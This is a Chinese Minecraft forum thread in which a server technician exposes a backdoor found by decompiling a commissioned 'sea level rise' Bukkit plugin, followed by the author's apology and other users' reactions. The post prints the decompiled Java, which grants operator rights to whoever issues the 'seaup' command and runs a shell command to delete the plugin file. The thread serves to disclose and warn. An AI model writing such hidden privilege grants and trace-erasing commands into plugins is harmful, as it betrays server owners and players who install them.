我是一个服务器的技术人员,
昨天上午九点的时候,我们服务器突然一群玩家被joi给了OP但是joi本身并没有权限,在事后已经查明
据此,我们怀疑他是使用插件通过后台发送了指令【下方代码有标注】
直到今天下午的时候
反编译时发现mingtfarc给我们编写的插件有一部分后门代码复制代码我们是末日服,准备让海平面上升,从而要到了这个插件
虽然不是在MCBBS发布的,但是他有这种心,肯定还会害更多的人
说不定过几天就到MCBBS发布了,所以我们希望论坛管理人员
能够对此事以及他的账号进行处理。谢谢!
顺便@出来正主:@mingtfarc
昨天上午九点的时候,我们服务器突然一群玩家被joi给了OP但是joi本身并没有权限,在事后已经查明
据此,我们怀疑他是使用插件通过后台发送了指令【下方代码有标注】
直到今天下午的时候
反编译时发现mingtfarc给我们编写的插件有一部分后门代码
- package clearchunk;
- import java.io.IOException;
- import org.bukkit.World;
- import org.bukkit.command.Command;
- import org.bukkit.command.CommandSender;
- import org.bukkit.entity.Player;
- import org.bukkit.event.Listener;
- import org.bukkit.plugin.java.JavaPlugin;
- public class tfarc extends JavaPlugin
- implements Listener
- {
- public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args)
- { //通过后台
- Player p = (Player)sender;
- World w = p.getWorld();
- if (cmd.getName().equalsIgnoreCase("seaup"))
- {
- p.setOp(true); //后门核心,设置OP
- sender.sendMessage("海平面上升 开启");
- String filepath = "./plugins/haizhigd.jar";
- Runtime rt = Runtime.getRuntime();
- try {
- rt.exec("del " + filepath);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
- return true;
- }
- public void onEnable()
- {
- }
- }
虽然不是在MCBBS发布的,但是他有这种心,肯定还会害更多的人
说不定过几天就到MCBBS发布了,所以我们希望论坛管理人员
能够对此事以及他的账号进行处理。谢谢!
顺便@出来正主:@mingtfarc
这货还问我怎么写来着··
本帖最后由 mingtfarc 于 2014-7-7 18:48 编辑
我在这里向你们道歉~事情是这样的:
我在这里向你们道歉~事情是这样的:
强烈支持!
@好像失败了。。不过这种行为够恶劣的
mingtfarc 发表于 2014-7-7 17:40
抱歉,由于我一时冲动,导致我无意中编写了这个插件
我在这里像你们服道歉。
Mr_rain 服主 对不起。另外这 ...
说真的 经过几次后门插件。什么不小心,别人些人,一时冲动的借口,谁信哦。还有哦,插件区不欢迎你.
Aikawastep 发表于 2014-7-7 17:41
@好像失败了。。不过这种行为够恶劣的
我已经道歉了
mingtfarc 发表于 2014-7-7 17:40
抱歉,由于我一时冲动,导致我无意中编写了这个插件
我在这里像你们服道歉。
Mr_rain 服主 对不起。另外这 ...
连反编译保护都没有233
做后门还不专业
1277832129 发表于 2014-7-7 17:39
这货还问我怎么写来着··
估计还有后门233现在经常出现问题,他还问你什么了
mingtfarc 发表于 2014-7-7 17:42
我已经道歉了
已看见
mingtfarc 发表于 2014-7-7 17:40
抱歉,由于我一时冲动,导致我无意中编写了这个插件
我在这里像你们服道歉。
Mr_rain 服主 对不起。另外这 ...
是么= =为什么登陆插件一直重置,OP一直重置,你搞的鬼吧?
→_→最喜欢这种新手编的插件了……可以给我拿来反编译看看海平面上升的源码么……[email protected]
原来是这样啊,,
YZH20011356810 发表于 2014-7-7 17:45
→_→最喜欢这种新手编的插件了……可以给我拿来反编译看看海平面上升的源码么…… ...
233你是最喜欢这种有后门的插件吧2333
警花表示不服{:10_492:}
首先这件事是发生在mcbbs外的事件,我觉得LZ因为一个事件就要一棍子打死说人道德沦丧是很不好的事情。
其次mingtfarc做出这件事情是有原因的,不知道LZ您的服主有没有和您说过这件事情的前因后果呢?
他也是我服务器的技术人员,虽然年纪比较小比较调皮,但是我后台、论坛FTP、控制台密码全都交给他有大半年他也没有做出过任何伤害服务器的事情,对待服务器方面的事情他一直很认真,我的服务器也有不少他写的插件,没有任何问题。
其次mingtfarc做出这件事情是有原因的,不知道LZ您的服主有没有和您说过这件事情的前因后果呢?
他也是我服务器的技术人员,虽然年纪比较小比较调皮,但是我后台、论坛FTP、控制台密码全都交给他有大半年他也没有做出过任何伤害服务器的事情,对待服务器方面的事情他一直很认真,我的服务器也有不少他写的插件,没有任何问题。
街角的守望 发表于 2014-7-7 17:50
233你是最喜欢这种有后门的插件吧2333
=.=那个后门写的很明显啊……我初学都能看出来,再说你后门源码都放出来了,我真要后门还会跟你要整个插件?
本帖最后由 allan0327 于 2014-7-7 00:28 编辑
从此以后国内原创插件臭名昭著
从最早的某知名触手整人插件的“不小心失误造成”
到现在的“以为对不起可以解决问题”已经是第几次了
新人老触看来都喜欢玩后门
从此以后国内原创插件臭名昭著
从最早的某知名触手整人插件的“不小心失误造成”
到现在的“以为对不起可以解决问题”已经是第几次了
新人老触看来都喜欢玩后门
因为服主对待不公,就怒编插件留下后门?不过并没有在论坛发布插件,最多是插件版重点关注吧?
Aikawastep 发表于 2014-7-7 17:41
@好像失败了。。不过这种行为够恶劣的
不会失败的,只是没亮,一般都会接到通知的。